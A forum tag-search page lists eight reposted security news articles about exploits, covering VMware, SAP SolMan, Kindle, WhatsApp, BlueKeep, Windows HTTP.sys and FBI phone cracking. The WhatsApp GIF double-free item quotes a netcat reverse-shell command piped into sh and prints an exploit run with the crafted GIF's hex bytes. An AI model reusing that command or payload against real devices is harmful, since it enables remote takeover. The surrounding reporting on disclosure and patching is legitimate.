Jump to content

Search the Community

Showing results for tags 'exploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Categories

  • Drivers
  • Filesharing
    • BitTorrent
    • eDonkey & Direct Connect (DC)
    • NewsReaders (Usenet)
    • Other P2P Clients & Tools
  • Internet
    • Download Managers & FTP Clients
    • Messengers
    • Web Browsers
    • Other Internet Tools
  • Multimedia
    • Codecs & Converters
    • Image Viewers & Editors
    • Media Players
    • Other Multimedia Software
  • Security
    • Anti-Malware
    • Firewalls
    • Other Security Tools
  • System
    • Benchmarking & System Info
    • Customization
    • Defrag Tools
    • Disc & Registry Cleaners
    • Management Suites
    • Other System Tools
  • Other Apps
    • Burning & Imaging
    • Document Viewers & Editors
    • File Managers & Archivers
    • Miscellaneous Applications
  • Linux Distributions

Categories

  • General News
  • File Sharing News
  • Mobile News
  • Software News
  • Security & Privacy News
  • Technology News

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Found 8 results

  1. Proof-of-concept exploit code is now available online for a critical authentication bypass vulnerability in multiple VMware products that allows attackers to gain admin privileges. VMware released security updates to address the CVE-2022-22972 flaw affecting Workspace ONE Access, VMware Identity Manager (vIDM), or vRealize Automation. The company also shared temporary workarounds for admins who cannot patch vulnerable appliances immediately, requiring them to disable all users except one provisioned administrator. Horizon3 security researchers released a proof-of-concept (PoC) exploit and technical analysis for this vulnerability today, following an announcement made on Tuesday that a CVE-2022-22972 PoC will be made available later this week. "This script can be used by bypass authentication on vRealize Automation 7.6 using CVE-2022-22972," the researchers said. "Workspace ONE and vIDM have different authentication endpoints, but the crux of the vulnerability remains the same. While Shodan only shows a limited number of VMware appliances exposed to attacks that would target this bug, there are several healthcare, education industry, and state government organizations with an increased risk of being targeted. CVE-2022-22972 is a relatively simple 'Host' header manipulation vulnerability. Motivated attackers would not have a hard time developing an exploit for this vulnerability," Horizon3 added. Successful login as vRealize Automation admin (Horizon3) Critical security flaw with "serious" ramifications "This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0014," VMware warned last week. "The ramifications of this vulnerability are serious. Given the severity of the vulnerability, we strongly recommend immediate action." The Cybersecurity and Infrastructure Security Agency (CISA) further highlighted this security flaw's severity level by issuing a new Emergency Directive that ordered Federal Civilian Executive Branch (FCEB) agencies to urgently update or remove VMware products from their networks. In April, VMware has patched two more critical vulnerabilities, a remote code execution bug (CVE-2022-22954) and a 'root' privilege escalation (CVE-2022-229600) in VMware Workspace ONE Access and VMware Identity Manager. Although the CVE-2022-22972 VMware auth bypass is not yet exploited in the wild, attackers have started abusing the ones addressed in April within 48 hours to backdoor vulnerable systems and deploy coin miners. "CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products," the cybersecurity agency said. Exploit released for critical VMware auth bypass bug, patch now
  2. Scanning Activity Detected After Release of Exploit for Critical SAP SolMan Flaw A Russian researcher has made public on GitHub a functional exploit targeting a critical vulnerability that SAP patched in its Solution Manager product in March 2020. Solution Manager (SolMan) was designed to provide central management for SAP and non-SAP systems and requires for Solution Manager Diagnostic Agent (SMDAgent) to be installed on each host, for the management of communications, monitoring, and diagnostics. Tracked as CVE-2020-6207 and featuring a CVSS score of 10, the security flaw is a missing authorization check in the EEM Manager component of SolMan, which could allow an unauthenticated, remote attacker to execute operating system commands on hosts, as the SMDAgent. The researcher who published the fully-functional exploit for the bug on GitHub claims the project is for educational purposes only, and that it “cannot be used for law violation or personal gain.” Following the publication of the exploit, however, security researchers at Onapsis, a firm that specializes in securing SAP applications, have observed scanning in the wild for vulnerable systems. It’s not common for proof-of-concept (PoC) exploits targeting SAP vulnerabilities to be made public, Onapsis says, adding that the availability of the code will likely result in an increase in exploitation attempts from both SAP-expert adversaries, and script kiddies. “A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance,” Onapsis notes. Being an administrative system, SolMan “has connections and trust relationships with every SAP system throughout the landscape,” and an attacker able to compromise it would essentially gain access to any business system connected to it, the security firm warns. Attackers looking to exploit the vulnerability need access to the SolMan HTTP(s) port. The remote attacker would gain control of the affected system with admin privileges, enabling them to conduct a wide range of activities. “An attacker will need network visibility to SolMan as this system is not frequently exposed to the Internet. So for most companies, risk of this exploit should be mostly limited to internal attacks (unless external attackers have already compromised another system and are inside the network,” Onapsis explains. Organizations that have already applied the available patches are not exposed to attacks leveraging this or other similar exploits. According to Onapsis, however, SolMan is often overlooked when it comes to patching, mainly because it does not hold any business information. Source: Scanning Activity Detected After Release of Exploit for Critical SAP SolMan Flaw
  3. Amazon Awards $18,000 for Exploit Allowing Kindle E-Reader Takeover Amazon has awarded an $18,000 bug bounty for an exploit chain that could have allowed an attacker to take complete control of a Kindle e-reader simply by knowing the targeted user’s email address. The attack, dubbed KindleDrip, was discovered in October 2020 by Yogev Bar-On, a researcher at Israel-based cybersecurity consulting firm Realmode Labs. KindleDrip involved the exploitation of three different security holes, all of which were addressed by Amazon. The first vulnerability in the exploit chain was related to the “Send to Kindle” feature, which allows users to send an e-book in MOBI format to their Kindle device via email as an attachment. Amazon generates an @kindle.com email address where a user can send e-books as an attachment from a list of email addresses approved by the user. Bar-On discovered that he could abuse this feature to send a specially crafted e-book that would allow him to execute arbitrary code on the targeted device. The malicious e-book achieved code execution by leveraging a vulnerability related to a library used by the Kindle to parse JPEG XR images. Exploitation required the user to click on a link inside an e-book that contained a malicious JPEG XR image, which would result in a web browser opening and the attacker’s code getting executed with limited privileges. The researcher also discovered a vulnerability that allowed him to escalate privileges and execute the code as root, which gave him complete access to the device. “The attacker could access device credentials and make purchases on the Kindle store using the victim’s credit card. Attackers could sell an e-book on the store and transfer money to their account,” Bar-On explained in a blog post. “At least the confirmation email would make the victim aware of the purchase.” It's worth noting that an attacker could not gain access to actual credit card numbers or passwords through such an attack because this type of data is not stored on the device. Instead, they could obtain special tokens that can be used to access the victim's account. An attacker would have only needed the targeted user’s email address and to convince the victim to click on a link inside the malicious e-book. While the Send to Kindle feature only allows users to send e-books from pre-approved email addresses, the researcher pointed out that an attacker could have simply used an email spoofing service. The prefix of the @kindle.com email address of the targeted user is in many cases the same as their regular email. The security holes that required changes to the Kindle firmware — the code execution and privilege escalation issues — were patched in December with the release of version 5.13.4. Amazon now also sends a verification link to email addresses that cannot be authenticated, it adds a few characters to some email aliases to make them more difficult to guess, and systems are in place to prevent brute-forcing of the email address. Kindle users do not need to take any action. A video has been published to show how a KindleDrip attack worked: “The security of our devices and services is a top priority. We have already released an automatic software update over the Internet fixing this issue for all Amazon Kindle models released after 2014,” an Amazon spokesperson told SecurityWeek. “Other impacted Kindle models will also receive this fix. We also have measures in place to help prevent customers from receiving content they haven’t requested. We appreciate the work of independent researchers who help bring potential issues to our attention.” *Updated with statement and clarifications from Amazon Source: Amazon Awards $18,000 for Exploit Allowing Kindle E-Reader Takeover
  4. WhatsApp has fixed a vulnerability involving malicious MP4 video files that could potentially allow an attacker to remotely access messages and files stored in the app. The flaw — identified as CVE-2019-11931 — made it possible for attackers to send a specially crafted MP4 file to remotely execute malicious code on the victim’s device without any intervention. In an advisory posted on its site, Facebook said: However, the presence of the flaw alone doesn’t mean it could be used for nefarious purposes. As is often the case, it can be an entry point for an exploit chain that links together a group of security vulnerabilities, thereby allowing a hacker to penetrate digital protections. When we reached out for a response, a spokesperson for the company said, “WhatsApp is constantly working to improve the security of our service. We make public, reports on potential issues we have fixed consistent with industry best practices. In this instance there is no reason to believe users were impacted.” The bug affected Android versions prior to 2.19.274, iOS versions prior to 2.19.100, Enterprise Client versions prior to 2.25.3, Windows Phone versions before and including 2.18.368, Business for Android versions prior to 2.19.104, and Business for iOS versions prior to 2.19.100. While there’s no indication that the flaw was exploited, the disclosure comes weeks after WhatsApp revealed that at least two dozen academics, lawyers, Dalit activists, and journalists in India were the target of surveillance by threat operators using security firm NSO Group’s Pegasus spyware. The social media giant has also sued the Israeli company for exploiting a now-fixed video calling flaw in WhatsApp service to surveil over 1,400 users. In the meantime, it is crucial that you update WhatsApp to the latest version to mitigate the risk of exploit. Source: WhatsApp fixes bug that would have let hackers exploit devices using MP4 files (via The Next Web) p/s: This news is posted under Security & Privacy news instead of Mobile News, as this news highlights the security issue found on older WhatsApp versions for mobile OS'es.
  5. After months of warnings, the first successful attack using Microsoft's BlueKeep vulnerability has arrived—but isn't nearly as bad as it could have been. Microsoft first announced the BlueKeep vulnerability in May; now, hackers have finally caught up with it. When Microsoft revealed last May that millions of Windows devices had a serious hackable flaw known as BlueKeep—one that could enable an automated worm to spread malware from computer to computer—it seemed only a matter of time before someone unleashed a global attack. As predicted, a BlueKeep campaign has finally struck. But so far it's fallen short of the worst case scenario. Security researchers have spotted evidence that their so-called honeypots—bait machines designed to help detect and analyze malware outbreaks—are being compromised en masse using the BlueKeep vulnerability. The bug in Microsoft's Remote Desktop Protocol allows a hacker to gain full remote code execution on unpatched machines; while it had previously only been exploited in proofs of concept, it has potentially devastating consequences. Another worm that targeted Windows machines in 2017, the NotPetya ransomware attack, caused more than 10 billion dollars in damage worldwide. But so far, the widespread BlueKeep hacking merely installs a cryptocurrency miner, leeching a victim's processing power to generate cryptocurrency. And rather than a worm that jumps unassisted from one computer to the next, these attackers appear to have scanned the internet for vulnerable machines to exploit. That makes this current wave unlikely to result in an epidemic. "BlueKeep has been out there for a while now. But this is the first instance where I’ve seen it being used on a mass scale," says Marcus Hutchins, a malware researcher for security firm Kryptos Logic who was one of the first to build a working proof-of-concept for the BlueKeep vulnerability. "They’re not seeking targets. They’re scanning the internet and spraying exploits." Hutchins says that he first learned of the BlueKeep hacking outbreak from fellow security researcher Kevin Beaumont, who observed his honeypot machines crashing over the last few days. Since those devices exposed only port 3389 to the internet—the port used by RDP—he quickly suspected BlueKeep. Beaumont then shared a "crashdump," forensic data from those crashed machines, with Hutchins, who confirmed that BlueKeep was the cause, and that the hackers had intended to install a cryptocurrency miner on the victim machines. Hutchins says he hasn’t yet determined which coin they’re trying to mine, and notes that the fact the target machines crash indicate that the exploit may be unreliable. The malware's authors appear to be using a version of the BlueKeep hacking technique included in the open-source hacking and penetration testing framework Metasploit, Hutchins says, which was made public in September. It's unclear also how many devices have been impacted, although the current BlueKeep outbreak appears to be far from the RDP pandemic that many feared. "I've seen a spike, but not the level I'd expect from a worm," says Jake Williams, a founder of the security firm Rendition Infosec, who has been monitoring his clients' networks for signs of exploitation. "It hasn’t hit critical mass yet." In fact, Williams argues, the absence of a more severe wave of BlueKeep hacking so far may actually indicate a success story for Microsoft's response to its BlueKeep bug—an unexpected happy ending. "Every month that passes by without a worm happening, more people patch and the vulnerable population goes down," Williams says. "Since the Metasploit module has been out for a couple of months now, the fact that no one has wormed this yet seems to indicate there’s been a cost-benefit analysis and there’s not a huge benefit to weaponizing it." But the threat BlueKeep poses to hundreds of thousands of Windows machines hasn't passed just yet. About 735,000 Windows computers remained vulnerable to BlueKeep according to one internet-wide scan by Rob Graham, a security researcher and founder of Errata Security, who shared those numbers with WIRED in August. And those machines could still be hit with a more serious—and more virulent—specimen of malware that exploits Microsoft's lingering RDP vulnerability. That could take the form of a ransomware worm in the model of NotPetya or also WannaCry, which infected almost a quarter million computers when it spread in May of 2017, causing somewhere between $4 and $8 billion damage. In the meantime, the current spate of BlueKeep cryptocurrency mining will represent an annoyance for those unlucky enough to have their computers crashed or hijacked by its cryptocurrency mining—and at most a vague harbinger of a more severe attack on the horizon. "A BlueKeep exploit is perfect for getting more systems to mine from," says Hutchins. "It’s not necessarily going to affect whether someone still makes a ransomware worm at some point." If helping hackers mine a few cryptocoins is the worst that BlueKeep ultimately inflicts, in other words, the internet will have dodged a bullet. Source
  6. Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device. A security researcher that goes online with the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage on it to remotely execute arbitrary code on the target device. The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244. The expert discovered that the flaw resides in the DDGifSlurp in decoding.c in libpl_droidsonroids_gif .so library used to generate the preview of the GIF file when a user opens Gallery view in the popular messaging application to send a media file, “When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.” The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command: system("toybox nc 192.168.2.72 4444 | sh"); The expert highlighted that it was not possible to point to system() function in libc.so, instead, it was necessary to first let PC jumps to an intermediate gadget. “we need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. ” Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.” The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability. [email protected]:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c ..... ..... ..... [email protected]:~/Desktop/gif$ ./exploit buffer = 0x7ffc586cd8b0 size = 266 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0 C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40 C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A 34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 18 00 0A 00 0F 00 01 00 00 3B Then he copied the content into a GIF file and send it as Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before to send it. The vulnerability will be triggered when the target user that has received the malicous GIF file will open WhatsApp Gallery to send a media file to his friend. Below the attack vectors devised by the expert: Local privilege escaltion (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database. Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context. The exploit works for WhatsApp version 2.19.230 and prior versions, the company addressed it with the release of the version 2.19.244 The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below. “In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert. Pierluigi Paganini SecurityAffairs – WhatsApp, hacking) Source: Security Affairs
  7. Exploit released for Windows 10 HTTP protocol flaw that was fixed by update KB5003173 Security researcher Axel Souchet has released proof of concept code on GitHub that exploits CVE-2021-31166. Luckily, this CVE was patched by Microsoft with the release of KB5003173 during the May 2021 Patch Tuesday. The proof of concept code lacks auto-spreading capabilities but malicious actors could develop their own code similar to his to perform remote code execution. Execution of Souchet's demonstration code triggers a blue screen of death. I've built a PoC for CVE-2021-31166 the "HTTP Protocol Stack Remote Code Execution Vulnerability": https://t.co/8mqLCByvCp 🔥🔥 pic.twitter.com/yzgUs2CQO5 — Axel Souchet (@0vercl0k) May 16, 2021 Alex further explains: The bug itself happens in http!UlpParseContentCoding where the function has a local LIST_ENTRY and appends item to it. When it's done, it moves it into the Request structure; but it doesn't NULL out the local list. The issue with that is that an attacker can trigger a code-path that frees every entries of the local list leaving them dangling in the Request object. Microsoft recommends prioritizing patching all affected servers since the bug is wormable and in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (HTTP.sys) to process packets. Systems running the latest version of Windows 10 that are fully patched should be safe from attacks. Source: GitHub via BleepingComputer Source: Exploit released for Windows 10 HTTP protocol flaw that was fixed by update KB5003173
  8. It's using counterterrorism tools against civil disobedience. Federal agents tend to focus their phone cracking efforts on terrorists, but they appear to have shifted their attention to civil disobedience. NYR Daily has learned that the FBI sent its “Fly Team” counterterrorism unit to Portland in mid-July to conduct the “initial exploitation” of phones and other devices used by people protesting police racism and violence. The email revealing the plan, from now-retired special agent George Chamberlain, also asked for help with the “investigative follow up.” There’s a concern that the FBI may have been pushing the limits of its device search powers in the process. Fly Team co-creator Raymond Holcomb told NYR that it’s unclear what authority the FBI unit had to search the phones, and whether or not agents had consent or warrants. The Fly Team was formed to tackle counterterrorism with a “different set of tools,” not everyday protesters. Members of the House Committee on Homeland Security have lately worried that federal agents have held on to seized phones for months. The FBI declined to comment on the details of the operation, citing the “ongoing nature” of cases like this. It maintained that the Portland activity met “all of our legal requirements,” and that it had “not been focused on peaceful protests.” Those claims might not be enough to satisfy some critics. Senator Ron Wyden has demanded clarity on FBI and Homeland Security activity in Portland, saying that it would be “outrageous” if Oregon residents faced federal surveillance like phone exploits due solely to their politics. Without transparency, it’s not certain that the FBI or DHS respected protesters’ digital rights. Source
×
×
  • Create New...